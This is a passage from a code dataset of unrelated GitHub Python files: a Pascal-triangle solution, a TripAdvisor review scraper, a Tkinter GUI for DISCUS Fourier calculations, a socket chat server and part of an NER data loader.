创建生成器对象\n print(gen.send(None)) # 挂起生成器\n while True:\n try:\n print(gen.send(True)) # 运行一次生成器并将值传入\n except: # 迭代结束跳出循环\n break\n","repo_name":"dopqob/Python","sub_path":"Python学习笔记/进程丨线程丨协程/协程.py","file_name":"协程.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"22109669277","text":"n, m = map(int, input().split())\n\ntable = [[0] * (i + 1) for i in range(1, n + 1)]\nfor i in range(0, n):\n table[i][0] = 1\n table[i][-1] = 1\n\nfor i in range(0, n):\n for j in range(1, i + 1):\n table[i][j] = table[i - 1][j] + table[i - 1][j - 1]\n\nprint(table[n - 1][m])","repo_name":"sarmsoo/baekjoon","sub_path":"Algo/baek/2407.py","file_name":"2407.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"26110850731","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom selenium import webdriver\nimport time\nimport requests\nfrom scrapy.http import TextResponse\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom scrapy.http import TextResponse\nimport pandas as pd\nimport numpy as np\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException\nimport re\n\n\n# In[2]:\n\n\ndef get_response(URL: str, Headers):\n \"\"\"\n This function takes URL as an input and 
provides a response:\n    - None if the status code is not 200\n    - scrapy TextResponse object otherwise\n    \"\"\"\n    page = requests.get(URL, headers = Headers )\n    if page.status_code == 200:\n        response = TextResponse(body=page.text,url=page.url,encoding=\"utf-8\")\n    else:\n        response = None\n        print(\"wrong status code\")\n    return response\n\n\n# # About hotel\n\n# In[6]:\n\n\nURL = 'https://www.tripadvisor.com/Hotel_Review-g293932-d23804505-Reviews-or10-Dave_Hotel_Yerevan-Yerevan.html#REVIEWS'\n\n\n# In[7]:\n\n\nuser_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36'\n\nHeaders = {'User-Agent': user_agent}\n\n\n# In[8]:\n\n\ndef hotel_info_scraper(URL : str, Headers = Headers):\n    response = get_response(URL, Headers)\n    title = response.css(\"h1::text\").extract_first()\n    num_views = response.css('span.qqniT::text').extract_first()\n    adress = response.css('span.fHvkI.PTrfg::text').extract_first()\n    overall_rating = response.css('span.uwJeR.P::text').extract_first()\n    location_score = response.css(\"div.SSDgd > div.WdWxQ:nth-child(1) > span::text\").extract()[1]\n    cleanness_score = response.css(\"div.SSDgd > div.WdWxQ:nth-child(2) > span::text\").extract()[1]\n    service_score = response.css(\"div.SSDgd > div.WdWxQ:nth-child(3) > span::text\").extract()[1]\n    value_score = response.css(\"div.SSDgd > div.WdWxQ:nth-child(4) > span::text\").extract()[1]\n    data = {'title' : title, 'num_views' : num_views, \"adress\" : adress, 'overall_rating' : overall_rating,\n            'location_score' : location_score , 'cleanness_score' : cleanness_score, 'service_score' : service_score,\n            \"value_score\" : value_score}\n    return data\n\n\n# In[9]:\n\n\ndata = hotel_info_scraper(URL)\n\n\n# In[10]:\n\n\ndata\n\n\n# # comment scraper\n\n# In[29]:\n\n\nopts = Options()\nopts.add_argument(\"--headless\")\nopts.add_argument(\"--disable-infobars\")\nopts.add_argument(\"start-maximized\")\nopts.add_argument(\"--disable-extensions\")\nopts.add_argument('--disable-notifications')\nopts.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\")\nPATH = r\"/Users/gevorgatanesyan/Downloads/chromedriver\"\n\n\n# In[30]:\n\n\ndef hotel_comment_scraper(URL : str):\n    s = Service(PATH)\n    browser = webdriver.Chrome(service=s, options=opts)\n    browser.get(URL)\n    \n    time.sleep(4)\n    browser.find_element(by=By.CSS_SELECTOR, value = \"h2[class ='aFUwN Cj F1 b']\").click() \n    \n    time.sleep(2)\n    \n    browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight/4)\") \n\n    time.sleep(4)\n    \n    try:\n        time.sleep(5)\n        browser.find_element(by=By.CSS_SELECTOR, value = 'ul[class = \"LojWi w S4\"] > li[class = \"ui_radio XpoVm\"]:nth-child(1)').click()\n        time.sleep(5)\n        browser.find_element(by=By.CSS_SELECTOR,value = 'ul[class = \"LojWi w S4\"] > li[class = \"ui_radio XpoVm\"]:nth-child(1)').click()\n        time.sleep(5)\n    except:\n        try:\n            browser.find_element(by=By.CSS_SELECTOR, value = 'ul[class = \"LojWi w S4\"] > li[class = \"ui_radio XpoVm\"]:nth-child(1)').click() \n        except:\n            print('i')\n    \n    try:\n        browser.find_element(by=By.CSS_SELECTOR,value = \"span.Ignyf._S.Z\").click()\n    except:\n        pass\n    \n    \n\n    comments = []\n    rated = []\n    locations = []\n    contributions = []\n    date_of_stay = []\n    review_identical = []\n    date_posted = []\n    \n    page = browser.page_source\n    response = TextResponse(body = page,encoding=\"utf-8\", url = URL)\n    review_identical_css = response.css('div[class = \"vTVDc\"]')\n    
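# NOTE: class names such as vTVDc and MziKN are TripAdvisor-internal and change over time; these selectors may need updating\n    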
comment_css = response.css(\"q\")\n location_css = response.css(\"div.MziKN \")\n \n comments.append([','.join(i) for i in [i.css('span::text').extract() for i in comment_css]])\n rated.append([re.findall('\\d', i)[0] for i in response.css(\"div[class ='Hlmiy F1'] > span\").extract()])\n locations.append([i.css('span.RdTWF > span::text').extract() for i in location_css])\n contributions.append([i.css('span:nth-child(1) > span.yRNgz::text').extract_first() for i in location_css])\n date_of_stay.append(response.css(\"span[class = 'teHYY _R Me S4 H3']::text\").extract())\n review_identical.append([i.css('div[class = \"ZzICe Me f\"] > div > span').extract() for i in review_identical_css])\n date_posted.append(response.css('div[class = \"cRVSd\"] > span::text').extract())\n \n \n \n while True:\n try:\n try:\n browser.find_element(by=By.CSS_SELECTOR,value = \"span.Ignyf._S.Z\").click()\n except:\n pass\n time.sleep(5)\n browser.find_element(by=By.CSS_SELECTOR, value = \"a[class ='ui_button nav next primary ']\").click() \n time.sleep(3)\n page = browser.page_source\n response = TextResponse(body = page,encoding=\"utf-8\", url = URL)\n \n review_identical_css = response.css('div[class = \"vTVDc\"]')\n comment_css = response.css(\"q\")\n location_css = response.css(\"div.MziKN \")\n \n comments.append([','.join(i) for i in [i.css('span::text').extract() for i in comment_css]])\n rated.append([re.findall('\\d', i)[0] for i in response.css(\"div[class ='Hlmiy F1'] > span\").extract()])\n locations.append([i.css('span.RdTWF > span::text').extract() for i in location_css])\n contributions.append([i.css('span:nth-child(1) > span.yRNgz::text').extract_first() for i in location_css])\n date_of_stay.append(response.css(\"span[class = 'teHYY _R Me S4 H3']::text\").extract())\n review_identical.append([i.css('div[class = \"ZzICe Me f\"] > div > span').extract() for i in review_identical_css])\n date_posted.append(response.css('div[class = \"cRVSd\"] > span::text').extract())\n \n except NoSuchElementException:\n break \n\n \n data = {'comments':comments, 'rated':rated, 'locations':locations, 'contributions':contributions, \n 'date_of_stay':date_of_stay,'review_identical':review_identical, 'date_posted':date_posted }\n df = []\n for i in range(len(data['comments'])):\n df.append({k:v[i] for k,v in data.items()})\n data=pd.DataFrame(columns=['comments','rated','locations','contributions','date_of_stay','review_identical','date_posted'])\n for i in range(len(df)):\n data = data.append(pd.DataFrame(df[i]), ignore_index = True)\n \n return data\n\n\n# In[31]:\n\n\nabc = hotel_comment_scraper(URL = 'https://www.tripadvisor.com/Hotel_Review-g293932-d23804505-Reviews-Dave_Hotel_Yerevan-Yerevan.html')\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"grigdav/ReputationManagement_data_collection","sub_path":"Trip advisor scraping hotels.py","file_name":"Trip advisor scraping hotels.py","file_ext":"py","file_size_in_byte":7515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"13114500271","text":"import tkinter as tk\nimport math as math\nfrom tkinter import ttk\nfrom support import *\nfrom exit_button import create_exit_button\nfrom discus_convert import *\nfrom discus_rad_menu import discus_rad_menu\nfrom lib_discus_suite import *\n\n\nclass SINGLE_FOUR_FR(tk.Frame):\n def __init__(self, parent):\n tk.Frame.__init__ ( self, parent )\n self.config(borderwidth=2, relief=tk.RAISED, 
background=COLORS.fr_read)\n self.grid(row=2, column=0, columnspan=8, sticky='EW')\n#\n# Get Element symbols and characteristic wavelength from DISCUS\n nwave, self.symbols, self.wavelengths = get_wave()\n#\n# Get Fourier settings from DISCUS\n corners, increment, radiation, bElement, wvle, ener, adp, ano, \\\n percent, lot_type, lot_num, lot_dim, lot_per \\\n = suite.discus_get_fourier()\n for i in range(4):\n for j in range(3):\n corners[i,j] = round_rbn(corners[i,j],5)\n wvle = round_rbn(wvle,5)\n ener = round_rbn(ener,5)\n#\n# Determine if an element was given for its characteristic radiation\n Element = bElement.decode()\n ElementNumber = -1\n for i in range(nwave):\n if Element == self.symbols[i]:\n ElementNumber = i\n break\n\n self.ll_h = tk.StringVar()\n self.ll_k = tk.StringVar()\n self.ll_l = tk.StringVar()\n self.lr_h = tk.StringVar()\n self.lr_k = tk.StringVar()\n self.lr_l = tk.StringVar()\n self.ul_h = tk.StringVar()\n self.ul_k = tk.StringVar()\n self.ul_l = tk.StringVar()\n self.tl_h = tk.StringVar()\n self.tl_k = tk.StringVar()\n self.tl_l = tk.StringVar()\n self.ll_h.set(str(corners[0,0]))\n self.ll_k.set(str(corners[0,1]))\n self.ll_l.set(str(corners[0,2]))\n self.lr_h.set(str(corners[1,0]))\n self.lr_k.set(str(corners[1,1]))\n self.lr_l.set(str(corners[1,2]))\n self.ul_h.set(str(corners[2,0]))\n self.ul_k.set(str(corners[2,1]))\n self.ul_l.set(str(corners[2,2]))\n self.tl_h.set(str(corners[3,0]))\n self.tl_k.set(str(corners[3,1]))\n self.tl_l.set(str(corners[3,2]))\n self.caption=ttk.Label(self, text='Single crystal Fourier calculations')\n self.label_h = ttk.Label(self, text='H', anchor='center')\n self.label_k = ttk.Label(self, text='K', anchor='center')\n self.label_l = ttk.Label(self, text='L', anchor='center')\n self.label_ll = ttk.Label(self, text='Lower left')\n self.label_lr = ttk.Label(self, text='Lower right')\n self.label_ul = ttk.Label(self, text='Upper left')\n self.label_tl = ttk.Label(self, text='Top left')\n self.entry_ll_h = ttk.Entry(self, textvariable=self.ll_h, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_ll_k = ttk.Entry(self, textvariable=self.ll_k, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_ll_l = ttk.Entry(self, textvariable=self.ll_l, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_lr_h = ttk.Entry(self, textvariable=self.lr_h, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_lr_k = ttk.Entry(self, textvariable=self.lr_k, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_lr_l = ttk.Entry(self, textvariable=self.lr_l, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_ul_h = ttk.Entry(self, textvariable=self.ul_h, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_ul_k = ttk.Entry(self, textvariable=self.ul_k, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_ul_l = ttk.Entry(self, textvariable=self.ul_l, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_tl_h = ttk.Entry(self, textvariable=self.tl_h, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_tl_k = ttk.Entry(self, textvariable=self.tl_k, width=8, \n justify='right', background=COLORS.en_back, 
foreground=COLORS.en_fore\n )\n self.entry_tl_l = ttk.Entry(self, textvariable=self.tl_l, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n #\n self.label_np = ttk.Label(self, text='Points along axis:')\n self.label_np_a = ttk.Label(self, text='Abscissa')\n self.label_np_o = ttk.Label(self, text='Ordinate')\n self.label_np_t = ttk.Label(self, text='Top axis')\n self.np_aa = tk.StringVar()\n self.np_oo = tk.StringVar()\n self.np_tt = tk.StringVar()\n self.np_aa.set(str(increment[0]))\n self.np_oo.set(str(increment[1]))\n self.np_tt.set(str(increment[2]))\n self.np_a = tk.Spinbox(self, from_=1, to=1001,width=8,\n justify='right', textvariable=self.np_aa,\n background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.np_o = tk.Spinbox(self, from_=1, to=1001,width=8,\n justify='right', textvariable=self.np_oo,\n background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.np_t = tk.Spinbox(self, from_=1, to=1001,width=8,\n justify='right', textvariable=self.np_tt,\n background=COLORS.en_back, foreground=COLORS.en_fore\n )\n #\n discus_rad_menu(self, nwave, radiation, wvle, ener, ElementNumber, adp, ano, 1, 4)\n #\n #\n self.Aver =tk.StringVar()\n self.Aver.set(percent)\n self.LabelAver =ttk.Label(self, \\\n text='Subtract scattering by average structure sampled at')\n self.EntryAver = ttk.Entry(self, textvariable=self.Aver, width=8,\n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore)\n self.LabelAverPer =ttk.Label(self, text='%')\n #\n #\n self.lot_use = tk.IntVar()\n if lot_type == 0:\n self.lot_use.set(0)\n else :\n self.lot_use.set(1)\n self.label_lot = ttk.Label(self, text='Lots:')\n self.check_lot = ttk.Checkbutton(self, text='Use', variable=self.lot_use)\n self.check_lot.bind('', self.lot_event)\n #\n self.label_lotshape =ttk.Label(self, text='Lot Shape:')\n self.lot_shape = tk.Listbox(self, height=2, width=10, selectbackground=COLORS.en_back,\n selectforeground=COLORS.en_fore, selectmode=tk.SINGLE\n )\n self.lot_shape.configure(exportselection=False)\n self.lot_shape.insert(1, 'Box' )\n self.lot_shape.insert(2, 'Ellipsoid')\n if lot_type == 1 or lot_type==0 :\n self.lot_shape.selection_set(0)\n elif lot_type == 2:\n self.lot_shape.selection_set(1)\n #\n self.label_lotnum =ttk.Label(self, text='Lot Number:')\n self.lotnn = tk.StringVar()\n self.lotnn.set(str(lot_num))\n self.lotn = tk.Spinbox(self, from_=1, to=1001, width=6, \n justify='right', textvariable=self.lotnn,\n background=COLORS.en_back, foreground=COLORS.en_fore\n )\n #\n self.label_lotdimx =ttk.Label(self, text='Lot Size X:')\n self.label_lotdimy =ttk.Label(self, text='Lot Size Y:')\n self.label_lotdimz =ttk.Label(self, text='Lot Size Z:')\n self.lotxx = tk.StringVar()\n self.lotxx.set(str(lot_dim[0]))\n self.lotyy = tk.StringVar()\n self.lotyy.set(str(lot_dim[1]))\n self.lotzz = tk.StringVar()\n self.lotzz.set(str(lot_dim[2]))\n self.lotx = tk.Spinbox(self, from_=1, to=1001, width=6, \n justify='right', textvariable=self.lotxx,\n background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.loty = tk.Spinbox(self, from_=1, to=1001, width=6, \n justify='right', textvariable=self.lotyy,\n background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.lotz = tk.Spinbox(self, from_=1, to=1001, width=6, \n justify='right', textvariable=self.lotzz,\n background=COLORS.en_back, foreground=COLORS.en_fore\n )\n #\n self.label_lot_per = ttk.Label(self, text='Lots:')\n self.lot_per = tk.IntVar()\n if lot_per == 0:\n self.lot_per.set(0)\n else :\n self.lot_per.set(1)\n 
self.check_lot_per = tk.Checkbutton(self, text='Periodic', variable=self.lot_per)\n self.lot_menu(self.lot_use.get())\n #\n #\n self.acc = ttk.Button(self, text='Run', \n command=lambda: self.calc_fourier(parent, \n corners, increment, radiation, wvle, ener, adp, ano, percent, \n lot_type, lot_num, lot_dim, lot_per ))\n #\n #\n self.show= ttk.Button(self, text='Show', \n command=lambda: self.show_fourier(parent, \n corners, increment, radiation, wvle, ener, adp, ano, percent, \n lot_type, lot_num, lot_dim, lot_per ))\n #\n #\n create_exit_button(self, 'discus', 11, 8, self.exit_command,\n (parent, corners, increment, radiation, wvle, ener, adp, ano,\n percent, lot_type, lot_num, lot_dim, lot_per )\n )\n #\n #\n self.CExplain = tk.Canvas(self, bg=COLORS.fr_read, height=200, width=400)\n self.CExplain.create_text( 20, 20, text='Calculates an arbitrary line, ', anchor=tk.W)\n self.CExplain.create_text( 20, 35, text='plane or voxel in reciprocal ', anchor=tk.W)\n self.CExplain.create_text( 20, 50, text='space. The corners are the ', anchor=tk.W)\n self.CExplain.create_text( 20, 65, text='lower left, lower right...', anchor=tk.W)\n self.CExplain.create_text( 20, 80, text='Points include the corners as ', anchor=tk.W)\n self.CExplain.create_text( 20, 95, text='shown in the schematic drawing.', anchor=tk.W)\n self.CExplain.create_line(400, 120, 600,160, width=4)\n self.CExplain.create_line(400, 120, 400, 20, width=4)\n self.CExplain.create_line(400, 120, 500, 60, width=4)\n self.CExplain.create_oval(400-5, 120-5, 400+5, 120+5, fill='black')\n self.CExplain.create_oval(467-5, 133-5, 467+5, 133+5, fill='black')\n self.CExplain.create_oval(533-5, 147-5, 533+5, 147+5, fill='black')\n self.CExplain.create_oval(600-5, 160-5, 600+5, 160+5, fill='black')\n self.CExplain.create_oval(400-5, 70-5, 400+5, 70+5, fill='black')\n self.CExplain.create_oval(400-5, 20-5, 400+5, 20+5, fill='black')\n self.CExplain.create_oval(500-5, 60-5, 500+5, 60+5, fill='black')\n self.CExplain.create_text(390, 120, text='Lower left', anchor=tk.E )\n self.CExplain.create_text(600, 180, text='Lower right', anchor=tk.CENTER)\n self.CExplain.create_text(390, 20, text='Upper left', anchor=tk.E )\n self.CExplain.create_text(510, 60, text='Top left', anchor=tk.W)\n self.CExplain.create_text(500, 160, text='Points along abscissa = 4', anchor=tk.E)\n self.CExplain.create_text(390, 70, text='Points along ordinate = 3', anchor=tk.E)\n #\n\n## # If an Element name was given, make this active\n## if ElementNumber > -1:\n## self.ele.configure(state='normal')\n## self.entry_wvle.configure(state='disabled')\n## self.entry_ener.configure(state='disabled')\n## self.rad_type.set(2)\n## else:\n## self.ele.configure(state='disabled')\n## self.entry_wvle.configure(state='normal')\n## self.entry_ener.configure(state='disabled')\n## self.rad_type.set(0)\n\n self.caption.grid( row=0, column=0, columnspan=8, pady=(10, 10))\n self.label_h.grid( row=1, column=1, sticky='EW')\n self.label_k.grid( row=1, column=2, sticky='EW')\n self.label_l.grid( row=1, column=3, sticky='EW')\n self.label_ll.grid( row=2, column=0, sticky='EW')\n self.label_lr.grid( row=3, column=0, sticky='EW')\n self.label_ul.grid( row=4, column=0, sticky='EW')\n self.label_tl.grid( row=5, column=0, sticky='EW')\n self.entry_ll_h.grid(row=2, column=1, sticky='EW')\n self.entry_ll_k.grid(row=2, column=2, sticky='EW')\n self.entry_ll_l.grid(row=2, column=3, sticky='EW')\n self.entry_lr_h.grid(row=3, column=1, sticky='EW')\n self.entry_lr_k.grid(row=3, column=2, sticky='EW')\n 
self.entry_lr_l.grid(row=3, column=3, sticky='EW')\n self.entry_ul_h.grid(row=4, column=1, sticky='EW')\n self.entry_ul_k.grid(row=4, column=2, sticky='EW')\n self.entry_ul_l.grid(row=4, column=3, sticky='EW')\n self.entry_tl_h.grid(row=5, column=1, sticky='EW')\n self.entry_tl_k.grid(row=5, column=2, sticky='EW')\n self.entry_tl_l.grid(row=5, column=3, sticky='EW')\n self.label_np.grid( row=6, column=0, pady=(5, 0), columnspan=2, sticky='EW')\n self.label_np_a.grid(row=7, column=0, sticky='EW')\n self.label_np_o.grid(row=8, column=0, sticky='EW')\n self.label_np_t.grid(row=9, column=0, sticky='EW')\n self.np_a.grid( row=7, column=1, columnspan=1, sticky='EW')\n self.np_o.grid( row=8, column=1, columnspan=1, sticky='EW')\n self.np_t.grid( row=9, column=1, columnspan=1, sticky='EW')\n #\n self.LabelAver.grid( row=6, column=3, columnspan=7, sticky='EW')\n self.EntryAver.grid( row=6, column=7, sticky='EW')\n self.LabelAverPer.grid( row=6, column=8, sticky='W')\n self.label_lot.grid( row=7, column=4, sticky='EW')\n self.check_lot.grid( row=7, column=5, sticky='EW')\n self.label_lotshape.grid(row= 9, column=3, sticky='EW')\n self.lot_shape.grid( row= 9, column=4, rowspan=2, sticky='EW')\n self.label_lotnum.grid( row=11, column=3, sticky='EW')\n self.lotn.grid( row=11, column=4, sticky='EW')\n self.label_lotdimx.grid( row= 9, column=5, sticky='EW')\n self.label_lotdimy.grid( row=10, column=5, sticky='EW')\n self.label_lotdimz.grid( row=11, column=5, sticky='EW')\n self.lotx.grid( row=9, column=6, sticky='EW')\n self.loty.grid( row=10, column=6, sticky='EW')\n self.lotz.grid( row=11, column=6, sticky='EW')\n self.label_lot_per.grid( row=8, column=4, sticky='EW')\n self.check_lot_per.grid( row=8, column=5, sticky='EW')\n self.show.grid( row=9, column=8)\n self.acc.grid( row=10, column=8)\n self.CExplain.grid( row=12, column=0, columnspan=9, sticky='EW')\n #\n line = 'fourier'\n suite.suite_learn(line)\n\n def lot_event(self, event):\n # Inverts the current setting, apparently the Chekbutton bind \n # Is executed BEFORE the button is inverted !?!?\n if self.lot_use.get()==1:\n choice = 0\n else:\n choice = 1\n self.lot_menu(choice)\n\n def lot_menu(self, choice):\n if choice ==1:\n self.label_lotshape.configure(foreground=COLORS.nor_fore)\n self.label_lotnum.configure(foreground=COLORS.nor_fore)\n self.label_lotdimx.configure(foreground=COLORS.nor_fore)\n self.label_lotdimy.configure(foreground=COLORS.nor_fore)\n self.label_lotdimz.configure(foreground=COLORS.nor_fore)\n self.label_lot_per.configure(foreground=COLORS.nor_fore)\n self.lot_shape.configure(state='normal')\n self.lotn.configure(state='normal')\n self.lotx.configure(state='normal')\n self.loty.configure(state='normal')\n self.lotz.configure(state='normal')\n self.check_lot_per.configure(state='normal')\n else:\n self.label_lotshape.configure(foreground=COLORS.dis_fore)\n self.label_lotnum.configure(foreground=COLORS.dis_fore)\n self.label_lotdimx.configure(foreground=COLORS.dis_fore)\n self.label_lotdimy.configure(foreground=COLORS.dis_fore)\n self.label_lotdimz.configure(foreground=COLORS.dis_fore)\n self.label_lot_per.configure(foreground=COLORS.dis_fore)\n self.lot_shape.configure(state='disabled')\n self.lotn.configure(state='disabled')\n self.lotx.configure(state='disabled')\n self.loty.configure(state='disabled')\n self.lotz.configure(state='disabled')\n self.check_lot_per.configure(state='disabled')\n\n\n def show_fourier(self, parent, \\\n corners, increment, radiation, wvle, ener, adp, ano,\n percent, lot_type, lot_num, 
lot_dim, lot_per\n                     ):\n\n        self.send_fourier(corners, increment, radiation, wvle, ener, adp, ano,\n                          percent, lot_type, lot_num, lot_dim, lot_per \n                          )\n        line= ('show')\n        suite.discus_calc_fourier(line)\n\n    def calc_fourier(self, parent, \n                     corners, increment, radiation, wvle, ener, adp, ano, \n                     percent, lot_type, lot_num, lot_dim, lot_per \n                     ):\n\n        self.send_fourier(corners, increment, radiation, wvle, ener, adp, ano, \n                          percent, lot_type, lot_num, lot_dim, lot_per \n                          )\n        line= ('run')\n        suite.discus_calc_fourier(line)\n        line = 'exit'\n        suite.discus_calc_fourier(line)\n        parent.b_fourmenu.menu.entryconfig(6, state='normal')\n        # Close menu\n        self.destroy()\n\n    def send_fourier(self, \n                     corners, increment, radiation, wvle, ener, adp, ano, percent, lot_type, \\\n                     lot_num, lot_dim, lot_per \n                     ):\n        line = ('ll' + ' ' + str(self.entry_ll_h.get()) \n                + ',' + str(self.entry_ll_k.get())\n                + ',' + str(self.entry_ll_l.get())\n                )\n        suite.discus_calc_fourier(line)\n        line = ('lr' + ' ' + str(self.entry_lr_h.get()) \n                + ',' + str(self.entry_lr_k.get())\n                + ',' + str(self.entry_lr_l.get())\n                )\n        suite.discus_calc_fourier(line)\n        line = ('ul' + ' ' + str(self.entry_ul_h.get()) \n                + ',' + str(self.entry_ul_k.get())\n                + ',' + str(self.entry_ul_l.get())\n                )\n        suite.discus_calc_fourier(line)\n        line = ('na' + ' ' + str(self.np_a.get()))\n        suite.discus_calc_fourier(line)\n        line = ('no' + ' ' + str(self.np_o.get()))\n        suite.discus_calc_fourier(line)\n        line = ('nt' + ' ' + str(self.np_t.get()))\n        suite.discus_calc_fourier(line)\n#\n        if is_empty(self.rad.curselection()):\n            radiation = 0\n        else:\n            radiation = int(self.rad.curselection()[0])\n        if radiation == 0:\n            line = 'xray'\n        elif radiation == 1:\n            line = 'neutron'\n        elif radiation == 2:\n            line = 'electron'\n        else :\n            line = 'xray'\n        suite.discus_calc_fourier(line)\n        if self.rad_type.get() == 0:\n            line = ('wvle' + ' ' + str(self.entry_wvle.get()))\n        elif self.rad_type.get() == 1:\n            line = ('energy' + ' ' + str(self.entry_ener.get()))\n        elif self.rad_type.get() == 2:\n            line = ('wvle ' + str(self.symbols[int(self.ele.curselection()[0])]))\n        suite.discus_calc_fourier(line)\n        if self.adp.get() == 1:\n            line = ('temp use')\n        elif self.adp.get() == 0:\n            line = ('temp ignore')\n        suite.discus_calc_fourier(line)\n        if self.ano.get() == 1:\n            line = ('disp anom')\n        elif self.ano.get() == 0:\n            line = ('disp off')\n        suite.discus_calc_fourier(line)\n        line = 'set aver, ' + str(self.Aver.get())\n        suite.discus_calc_fourier(line)\n        if self.lot_use.get() == 0:\n            line = 'lots OFF'\n        else:\n            if is_empty(self.lot_shape.curselection()):\n                shape = 0\n            else:\n                shape = int(self.lot_shape.curselection()[0])\n            if self.lot_per.get()== 1:\n                period = 'yes'\n            else:\n                period = 'no'\n            if shape==0:\n                line = 'lots ' + 'box,' + str(self.lotx.get()) + ',' \\\n                       + str(self.loty.get()) + ',' \\\n                       + str(self.lotz.get()) + ',' \\\n                       + str(self.lotn.get()) + ',' + period\n            else:\n                # ellipsoid-shaped lots, as selected in the lot-shape listbox\n                line = 'lots ' + 'ellipsoid,' + str(self.lotx.get()) + ',' \\\n                       + str(self.loty.get()) + ',' \\\n                       + str(self.lotz.get()) + ',' \\\n                       + str(self.lotn.get()) + ',' + period\n        suite.discus_calc_fourier(line)\n\n    def exit_command(self, parent, \\\n                     corners, increment, radiation, wvle, ener, adp, ano, \\\n                     percent, lot_type, lot_num, lot_dim, lot_per \n                     ):\n        self.send_fourier(\\\n                          corners, increment, radiation, wvle, ener, adp, ano, \n                          percent, lot_type, lot_num, lot_dim, lot_per \n                          )\n        line = 'exit'\n        
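# a final 'exit' leaves the DISCUS fourier sub-menu once all settings have been transferred\n        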
suite.discus_calc_fourier(line)\n#\n","repo_name":"rneder/DiffuseGUI","sub_path":"CODE/discus_fourier.py","file_name":"discus_fourier.py","file_ext":"py","file_size_in_byte":21976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"38012981559","text":"import threading\nimport socket\n\ns= socket.socket()\nip=\"192.168.43.140\"\nport=1234\ns.bind((ip,port))\ns.listen()\nc,addr=s.accept()\nsender_ip=str(addr[0])\n\nprint(\"\\n\\t\\t\\t\\t\\tWELCOME\\n\")\nprint(\"connected successfully...\")\n\ns.listen()\ndef send():\n    while True:\n        data=input(\"\\n\\t\\t\\t\\t\\t\\t<<<: \")\n        data=data.encode()\n        c.send(data)\n\n\ndef recv():\n    while True:\n        data=c.recv(1024)\n        data=data.decode()\n        print(\"\\n\\t\"+ip+\":>>> \"+data)\n\nreceive_thread=threading.Thread(target=recv)\nsend_thread=threading.Thread(target=send)\n\nreceive_thread.start()\nsend_thread.start()\ns.close()\t\n","repo_name":"kush95300/KUKU-Messenger-App","sub_path":"KUKU_chat_server.py","file_name":"KUKU_chat_server.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"31161158898","text":"import pandas as pd\nimport json\nfrom transformers.tokenization_bert import BertTokenizer\n\n\ndef read_data(file_path,mode=0):\n    if mode==0:\n        df = pd.read_csv(file_path,sep=\"\\t\",header=None,names=['id','content',\"type\",\"entity\"])\n    else:\n        df = pd.read_csv(file_path,sep=\"\\t\",header=None,names=[\"id\",\"content\"])\n    return df\n\n\ndef get_ner_data_by_df(file_path,mode):\n    data = []\n    df = read_data(file_path,mode)\n    if mode!=0:\n        for row in df.iterrows():\n            example = {}\n            example[\"content\"] = row[1]\n            example[\"entity_list\"] = []\n            data.append(example)\n    else:\n        df = df[df.type.apply(lambda x: type(x)!=float)] ## erase examples without type and entity\n        unique_sentences = df.content.unique()\n        for sentence in unique_sentences:\n            example = {}\n            entity_list = _get_entity_list(df,sentence)\n            example[\"content\"] = sentence\n            example['entity_list'] = entity_list\n            data.append(example)\n    return data\n\n\n\ndef get_ner_data_by_txt(file_path,mode):\n    data_dict = {}\n    with open(file_path,'r',encoding='utf-8') as file:\n        for line in file.readlines():\n            row = line.split(\"\\t\")\n            if mode==0 and len(row)==4:\n                id = row[0]\n                content = row[1]\n                type = row[2]\n                entity = row[3].strip()\n                if type!=\"NaN\":\n                    if content not in data_dict:\n                        data_dict[content] = [entity]\n                    else :\n                        data_dict[content]+=[entity]\n                else:\n                    continue\n            elif mode==1 and len(row)==4:\n                id = row[0]\n                content = row[1].strip()\n                data_dict[id] = content\n            else:\n                print(\"reading error: {}\".format(line))\n    if mode==0:\n        data = 